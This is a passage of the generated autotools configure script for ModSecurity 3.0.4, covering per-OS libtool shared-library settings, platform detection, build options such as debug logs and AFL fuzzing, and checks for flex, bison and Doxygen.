sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec postinstall_cmds='base_file=`basename \$file`~ dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; $ECHO \$dlname'\''`~ dldir=$destdir/`dirname \$dlpath`~ test -d \$dldir || mkdir -p \$dldir~ $install_prog $dir/$dlname \$dldir/$dlname~ chmod a+x \$dldir/$dlname~ if test -n '\''$stripme'\'' && test -n '\''$striplib'\''; then eval '\''$striplib \$dldir/$dlname'\'' || exit \$?; fi' postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; $ECHO \$dlname'\''`~ dlpath=$dir/\$dldll~ $RM \$dlpath' ;; osf3* | osf4* | osf5*) version_type=osf need_lib_prefix=no need_version=no soname_spec='$libname$release$shared_ext$major' library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH sys_lib_search_path_spec="/usr/shlib /usr/ccs/lib /usr/lib/cmplrs/cc /usr/lib /usr/local/lib /var/shlib" sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec ;; rdos*) dynamic_linker=no ;; solaris*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes hardcode_into_libs=yes # ldd complains unless libraries are executable postinstall_cmds='chmod +x $lib' ;; sunos4*) version_type=sunos library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' finish_cmds='PATH="\$PATH:/usr/etc" ldconfig $libdir' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes if test yes = "$with_gnu_ld"; then need_lib_prefix=no fi need_version=yes ;; sysv4 | sysv4.3*) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH case $host_vendor in sni) shlibpath_overrides_runpath=no need_lib_prefix=no runpath_var=LD_RUN_PATH ;; siemens) need_lib_prefix=no ;; motorola) need_lib_prefix=no need_version=no shlibpath_overrides_runpath=no sys_lib_search_path_spec='/lib /usr/lib /usr/ccs/lib' ;; esac ;; sysv4*MP*) if test -d /usr/nec; then version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$shared_ext.$versuffix $libname$shared_ext.$major $libname$shared_ext' soname_spec='$libname$shared_ext.$major' shlibpath_var=LD_LIBRARY_PATH fi ;; sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX* | sysv4*uw2*) version_type=sco need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes hardcode_into_libs=yes if test yes = "$with_gnu_ld"; then sys_lib_search_path_spec='/usr/local/lib /usr/gnu/lib /usr/ccs/lib /usr/lib /lib' else sys_lib_search_path_spec='/usr/ccs/lib /usr/lib' case $host_os in sco3.2v5*) sys_lib_search_path_spec="$sys_lib_search_path_spec /lib" ;; esac fi sys_lib_dlsearch_path_spec='/usr/lib' ;; tpf*) # TPF is a cross-target only. Preferred cross-host = GNU/Linux. version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no hardcode_into_libs=yes ;; uts4*) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH ;; *) dynamic_linker=no ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: result: $dynamic_linker" >&5 $as_echo "$dynamic_linker" >&6; } test no = "$dynamic_linker" && can_build_shared=no variables_saved_for_relink="PATH $shlibpath_var $runpath_var" if test yes = "$GCC"; then variables_saved_for_relink="$variables_saved_for_relink GCC_EXEC_PREFIX COMPILER_PATH LIBRARY_PATH" fi if test set = "${lt_cv_sys_lib_search_path_spec+set}"; then sys_lib_search_path_spec=$lt_cv_sys_lib_search_path_spec fi if test set = "${lt_cv_sys_lib_dlsearch_path_spec+set}"; then sys_lib_dlsearch_path_spec=$lt_cv_sys_lib_dlsearch_path_spec fi # remember unaugmented sys_lib_dlsearch_path content for libtool script decls... configure_time_dlsearch_path=$sys_lib_dlsearch_path_spec # ... but it needs LT_SYS_LIBRARY_PATH munging for other configure-time code func_munge_path_list sys_lib_dlsearch_path_spec "$LT_SYS_LIBRARY_PATH" # to be used as default LT_SYS_LIBRARY_PATH value in generated libtool configure_time_lt_sys_library_path=$LT_SYS_LIBRARY_PATH { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to hardcode library paths into programs" >&5 $as_echo_n "checking how to hardcode library paths into programs... " >&6; } hardcode_action_CXX= if test -n "$hardcode_libdir_flag_spec_CXX" || test -n "$runpath_var_CXX" || test yes = "$hardcode_automatic_CXX"; then # We can hardcode non-existent directories. if test no != "$hardcode_direct_CXX" && # If the only mechanism to avoid hardcoding is shlibpath_var, we # have to relink, otherwise we might link with an installed library # when we should be linking with a yet-to-be-installed one ## test no != "$_LT_TAGVAR(hardcode_shlibpath_var, CXX)" && test no != "$hardcode_minus_L_CXX"; then # Linking always hardcodes the temporary library directory. hardcode_action_CXX=relink else # We can link without hardcoding, and we can hardcode nonexisting dirs. hardcode_action_CXX=immediate fi else # We cannot hardcode anything, or else we can only hardcode existing # directories. hardcode_action_CXX=unsupported fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $hardcode_action_CXX" >&5 $as_echo "$hardcode_action_CXX" >&6; } if test relink = "$hardcode_action_CXX" || test yes = "$inherit_rpath_CXX"; then # Fast installation is not supported enable_fast_install=no elif test yes = "$shlibpath_overrides_runpath" || test no = "$enable_shared"; then # Fast installation is not necessary enable_fast_install=needless fi fi # test -n "$compiler" CC=$lt_save_CC CFLAGS=$lt_save_CFLAGS LDCXX=$LD LD=$lt_save_LD GCC=$lt_save_GCC with_gnu_ld=$lt_save_with_gnu_ld lt_cv_path_LDCXX=$lt_cv_path_LD lt_cv_path_LD=$lt_save_path_LD lt_cv_prog_gnu_ldcxx=$lt_cv_prog_gnu_ld lt_cv_prog_gnu_ld=$lt_save_with_gnu_ld fi # test yes != "$_lt_caught_CXX_error" ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu ac_config_commands="$ac_config_commands libtool" # Only expand once: # Identify platform case $host in *-*-aix*) echo "Checking platform... Identified as AIX" $as_echo "#define AIX 1" >>confdefs.h PLATFORM="AIX" ;; *-*-hpux*) echo "Checking platform... Identified as HPUX" $as_echo "#define HPUX 1" >>confdefs.h PLATFORM="HPUX" ;; *-*-darwin*) echo "Checking platform... Identified as Macintosh OS X" $as_echo "#define MACOSX 1" >>confdefs.h PLATFORM="MacOSX" ;; *-*-linux*) echo "Checking platform... Identified as Linux" $as_echo "#define LINUX 1" >>confdefs.h PLATFORM="Linux" ;; *-*-solaris*) echo "Checking platform... Identified as Solaris" $as_echo "#define SOLARIS 1" >>confdefs.h PLATFORM="Solaris" ;; *-*-freebsd*) echo "Checking platform... Identified as FreeBSD" $as_echo "#define FREEBSD 1" >>confdefs.h PLATFORM="FreeBSD" ;; *-*-netbsd*) echo "Checking platform... Identified as NetBSD" $as_echo "#define NETBSD 1" >>confdefs.h PLATFORM="NetBSD" ;; *-*-openbsd*) echo "Checking platform... Identified as OpenBSD" $as_echo "#define OPENBSD 1" >>confdefs.h PLATFORM="OpenBSD" ;; *-*-kfreebsd*) echo "Checking platform... Identified as kFreeBSD, treating as linux" $as_echo "#define FREEBSD 1" >>confdefs.h PLATFORM="kFreeBSD" ;; *-*-gnu*.*) echo "Checking platform... Identified as HURD, treating as linux" $as_echo "#define LINUX 1" >>confdefs.h PLATFORM="HURD" ;; *) echo "Unknown CANONICAL_HOST $host" exit ;; esac # Variables to be used inside the Makefile.am files. MSC_BASE_DIR=`pwd` MSC_VERSION_INFO=3:4:0 MSC_VERSION_WITH_PATCHLEVEL=3.0.4 MSC_VERSION=3.0 MSC_GIT_VERSION=v3.0.4 # Check whether --enable-debug-logs was given. if test "${enable_debug_logs+set}" = set; then : enableval=$enable_debug_logs; case "${enableval}" in yes) debugLogs=true ;; no) debugLogs=false ;; *) as_fn_error $? "bad value ${enableval} for --enable-debug-logs" "$LINENO" 5 ;; esac else debugLogs=true fi if test "$debugLogs" != "true"; then MODSEC_NO_LOGS="-DNO_LOGS=1" fi # Fuzzer # Check whether --enable-afl-fuzz was given. if test "${enable_afl_fuzz+set}" = set; then : enableval=$enable_afl_fuzz; case "${enableval}" in yes) aflFuzzer=true ;; no) aflFuzzer=false ;; *) as_fn_error $? "bad value ${enableval} for --enable-afl-fuzz" "$LINENO" 5 ;; esac else aflFuzzer=false fi # Examples # Check whether --enable-examples was given. if test "${enable_examples+set}" = set; then : enableval=$enable_examples; case "${enableval}" in yes) buildExamples=true ;; no) buildExamples=false ;; *) as_fn_error $? "bad value ${enableval} for --enable-examples" "$LINENO" 5 ;; esac else buildExamples=true fi # Parser # Check whether --enable-parser-generation was given. if test "${enable_parser_generation+set}" = set; then : enableval=$enable_parser_generation; case "${enableval}" in yes) buildParser=true ;; no) buildParser=false ;; *) as_fn_error $? "bad value ${enableval} for --enable-parser-generation" "$LINENO" 5 ;; esac else buildParser=false fi # Mutex # Check whether --enable-mutex-on-pm was given. if test "${enable_mutex_on_pm+set}" = set; then : enableval=$enable_mutex_on_pm; case "${enableval}" in yes) mutexPm=true ;; no) mutexPm=false ;; *) as_fn_error $? "bad value ${enableval} for --enable-mutex-on-pm" "$LINENO" 5 ;; esac else mutexPm=false fi if test "$mutexPm" == "true"; then MODSEC_MUTEX_ON_PM="-DMUTEX_ON_PM=1" fi if test $buildParser = true; then for ac_prog in 'bison -y' byacc do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_YACC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$YACC"; then ac_cv_prog_YACC="$YACC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_YACC="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi YACC=$ac_cv_prog_YACC if test -n "$YACC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $YACC" >&5 $as_echo "$YACC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$YACC" && break done test -n "$YACC" || YACC="yacc" for ac_prog in flex lex do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_LEX+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$LEX"; then ac_cv_prog_LEX="$LEX" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_LEX="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi LEX=$ac_cv_prog_LEX if test -n "$LEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $LEX" >&5 $as_echo "$LEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$LEX" && break done test -n "$LEX" || LEX=":" if test "x$LEX" != "x:"; then cat >conftest.l <<_ACEOF %% a { ECHO; } b { REJECT; } c { yymore (); } d { yyless (1); } e { /* IRIX 6.5 flex 2.5.4 underquotes its yyless argument. */ yyless ((input () != 0)); } f { unput (yytext[0]); } . { BEGIN INITIAL; } %% #ifdef YYTEXT_POINTER extern char *yytext; #endif int main (void) { return ! yylex () + ! yywrap (); } _ACEOF { { ac_try="$LEX conftest.l" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$LEX conftest.l") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking lex output file root" >&5 $as_echo_n "checking lex output file root... " >&6; } if ${ac_cv_prog_lex_root+:} false; then : $as_echo_n "(cached) " >&6 else if test -f lex.yy.c; then ac_cv_prog_lex_root=lex.yy elif test -f lexyy.c; then ac_cv_prog_lex_root=lexyy else as_fn_error $? "cannot find output from $LEX; giving up" "$LINENO" 5 fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_lex_root" >&5 $as_echo "$ac_cv_prog_lex_root" >&6; } LEX_OUTPUT_ROOT=$ac_cv_prog_lex_root if test -z "${LEXLIB+set}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking lex library" >&5 $as_echo_n "checking lex library... " >&6; } if ${ac_cv_lib_lex+:} false; then : $as_echo_n "(cached) " >&6 else ac_save_LIBS=$LIBS ac_cv_lib_lex='none needed' for ac_lib in '' -lfl -ll; do LIBS="$ac_lib $ac_save_LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ `cat $LEX_OUTPUT_ROOT.c` _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_lib_lex=$ac_lib fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext test "$ac_cv_lib_lex" != 'none needed' && break done LIBS=$ac_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_lex" >&5 $as_echo "$ac_cv_lib_lex" >&6; } test "$ac_cv_lib_lex" != 'none needed' && LEXLIB=$ac_cv_lib_lex fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether yytext is a pointer" >&5 $as_echo_n "checking whether yytext is a pointer... " >&6; } if ${ac_cv_prog_lex_yytext_pointer+:} false; then : $as_echo_n "(cached) " >&6 else # POSIX says lex can declare yytext either as a pointer or an array; the # default is implementation-dependent. Figure out which it is, since # not all implementations provide the %pointer and %array declarations. ac_cv_prog_lex_yytext_pointer=no ac_save_LIBS=$LIBS LIBS="$LEXLIB $ac_save_LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #define YYTEXT_POINTER 1 `cat $LEX_OUTPUT_ROOT.c` _ACEOF if ac_fn_c_try_link "$LINENO"; then : ac_cv_prog_lex_yytext_pointer=yes fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_save_LIBS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_lex_yytext_pointer" >&5 $as_echo "$ac_cv_prog_lex_yytext_pointer" >&6; } if test $ac_cv_prog_lex_yytext_pointer = yes; then $as_echo "#define YYTEXT_POINTER 1" >>confdefs.h fi rm -f conftest.l $LEX_OUTPUT_ROOT.c fi # Extract the first word of "flex", so it can be a program name with args. set dummy flex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_FLEX+:} false; then : $as_echo_n "(cached) " >&6 else case $FLEX in [\\/]* | ?:[\\/]*) ac_cv_path_FLEX="$FLEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_FLEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi FLEX=$ac_cv_path_FLEX if test -n "$FLEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $FLEX" >&5 $as_echo "$FLEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test "x$FLEX" = "x" && as_fn_error $? "flex is needed to build ModSecurity" "$LINENO" 5 # Extract the first word of "bison", so it can be a program name with args. set dummy bison; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_BISON+:} false; then : $as_echo_n "(cached) " >&6 else case $BISON in [\\/]* | ?:[\\/]*) ac_cv_path_BISON="$BISON" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_BISON="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi BISON=$ac_cv_path_BISON if test -n "$BISON"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $BISON" >&5 $as_echo "$BISON" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test "x$BISON" = "x" && as_fn_error $? "bison is needed to build ModSecurity" "$LINENO" 5 # Extract the first word of "$YACC", so it can be a program name with args. set dummy $YACC; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_YACC_INST+:} false; then : $as_echo_n "(cached) " >&6 else case $YACC_INST in [\\/]* | ?:[\\/]*) ac_cv_path_YACC_INST="$YACC_INST" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_YACC_INST="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi YACC_INST=$ac_cv_path_YACC_INST if test -n "$YACC_INST"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $YACC_INST" >&5 $as_echo "$YACC_INST" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test ! -f "$srcdir/gram.c"; then if test -z "$YACC_INST"; then as_fn_error $? "yacc not found - unable to compile ModSecurity" "$LINENO" 5 fi fi fi # Decide if we want to build the tests or not. buildTestUtilities=false if test "x$YAJL_FOUND" = "x1"; then # Regression tests will not be able to run without the logging support. # But we still have the unit tests. # if test "$debugLogs" = "true"; then buildTestUtilities=true # fi fi if test $buildTestUtilities = true; then TEST_UTILITIES_TRUE= TEST_UTILITIES_FALSE='#' else TEST_UTILITIES_TRUE='#' TEST_UTILITIES_FALSE= fi if test $buildTestUtilities = true; then if test $debugLogs = true; then if test -f ./test/test-list.sh; then TEST_CASES=`./test/test-list.sh` fi fi fi if test $buildExamples = true; then EXAMPLES_TRUE= EXAMPLES_FALSE='#' else EXAMPLES_TRUE='#' EXAMPLES_FALSE= fi if test $buildParser = true; then BUILD_PARSER_TRUE= BUILD_PARSER_FALSE='#' else BUILD_PARSER_TRUE='#' BUILD_PARSER_FALSE= fi if test $mutexPm = true; then USE_MUTEX_ON_PM_TRUE= USE_MUTEX_ON_PM_FALSE='#' else USE_MUTEX_ON_PM_TRUE='#' USE_MUTEX_ON_PM_FALSE= fi # General link options if test "$PLATFORM" != "MacOSX" -a "$PLATFORM" != "OpenBSD"; then GLOBAL_LDADD="-lrt " fi if test "$aflFuzzer" == "true"; then FUZZ_CPPCFLAGS="-fsanitize=address -fsanitize-coverage=4 " GLOBAL_LDADD="$GLOBAL_LDADD -fsanitize=address " GLOBAL_CPPFLAGS="$GLOBAL_CPPFLAGS $FUZZ_CPPCFLAGS" $buildExamples = false fi if test $aflFuzzer = true; then AFL_FUZZER_TRUE= AFL_FUZZER_FALSE='#' else AFL_FUZZER_TRUE='#' AFL_FUZZER_FALSE= fi GLOBAL_CFLAGS="" # Files to be generated via autotools. ac_config_files="$ac_config_files modsecurity.pc Makefile doc/Makefile src/Makefile others/Makefile tools/Makefile tools/rules-check/Makefile" if test -z "$TEST_UTILITIES_TRUE"; then : ac_config_files="$ac_config_files test/Makefile test/benchmark/Makefile" fi if test -z "$EXAMPLES_TRUE"; then : ac_config_files="$ac_config_files examples/Makefile examples/simple_example_using_c/Makefile examples/multiprocess_c/Makefile examples/reading_logs_with_offset/Makefile examples/reading_logs_via_rule_message/Makefile examples/using_bodies_in_chunks/Makefile" fi if test -z "$AFL_FUZZER_TRUE"; then : ac_config_files="$ac_config_files test/fuzzer/Makefile" fi if test -z "$BUILD_PARSER_TRUE"; then : ac_config_files="$ac_config_files src/parser/Makefile" fi ac_config_headers="$ac_config_headers src/config.h" # Doxygen support # Files: DX_PROJECT=ModSecurity DX_CONFIG=doc/doxygen.cfg DX_DOCDIR=doxygen-doc # Environment variables used inside doxygen.cfg: DX_ENV="$DX_ENV SRCDIR='$srcdir'" DX_ENV="$DX_ENV PROJECT='$DX_PROJECT'" DX_ENV="$DX_ENV DOCDIR='$DX_DOCDIR'" DX_ENV="$DX_ENV VERSION='$PACKAGE_VERSION'" # Doxygen itself: # Check whether --enable-doxygen-doc was given. if test "${enable_doxygen_doc+set}" = set; then : enableval=$enable_doxygen_doc; case "$enableval" in #( y|Y|yes|Yes|YES) DX_FLAG_doc=1 ;; #( n|N|no|No|NO) DX_FLAG_doc=0 ;; #( *) as_fn_error $? "invalid value '$enableval' given to doxygen-doc" "$LINENO" 5 ;; esac else DX_FLAG_doc=1 fi if test "$DX_FLAG_doc" = 1; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}doxygen", so it can be a program name with args. set dummy ${ac_tool_prefix}doxygen; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_DOXYGEN+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_DOXYGEN in [\\/]* | ?:[\\/]*) ac_cv_path_DX_DOXYGEN="$DX_DOXYGEN" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_DOXYGEN="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_DOXYGEN=$ac_cv_path_DX_DOXYGEN if test -n "$DX_DOXYGEN"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_DOXYGEN" >&5 $as_echo "$DX_DOXYGEN" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_DOXYGEN"; then ac_pt_DX_DOXYGEN=$DX_DOXYGEN # Extract the first word of "doxygen", so it can be a program name with args. set dummy doxygen; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_DOXYGEN+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_DOXYGEN in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_DOXYGEN="$ac_pt_DX_DOXYGEN" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_DOXYGEN="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_DOXYGEN=$ac_cv_path_ac_pt_DX_DOXYGEN if test -n "$ac_pt_DX_DOXYGEN"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_DOXYGEN" >&5 $as_echo "$ac_pt_DX_DOXYGEN" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_DOXYGEN" = x; then DX_DOXYGEN="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_DOXYGEN=$ac_pt_DX_DOXYGEN fi else DX_DOXYGEN="$ac_cv_path_DX_DOXYGEN" fi if test "$DX_FLAG_doc$DX_DOXYGEN" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: doxygen not found - will not generate any doxygen documentation" >&5 $as_echo "$as_me: WARNING: doxygen not found - will not generate any doxygen documentation" >&2;} DX_FLAG_doc=0 fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}perl", so it can be a program name with args. set dummy ${ac_tool_prefix}perl; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_PERL+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_PERL in [\\/]* | ?:[\\/]*) ac_cv_path_DX_PERL="$DX_PERL" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_PERL="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_PERL=$ac_cv_path_DX_PERL if test -n "$DX_PERL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_PERL" >&5 $as_echo "$DX_PERL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_PERL"; then ac_pt_DX_PERL=$DX_PERL # Extract the first word of "perl", so it can be a program name with args. set dummy perl; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_PERL+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_PERL in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_PERL="$ac_pt_DX_PERL" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_PERL="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_PERL=$ac_cv_path_ac_pt_DX_PERL if test -n "$ac_pt_DX_PERL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_PERL" >&5 $as_echo "$ac_pt_DX_PERL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_PERL" = x; then DX_PERL="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: 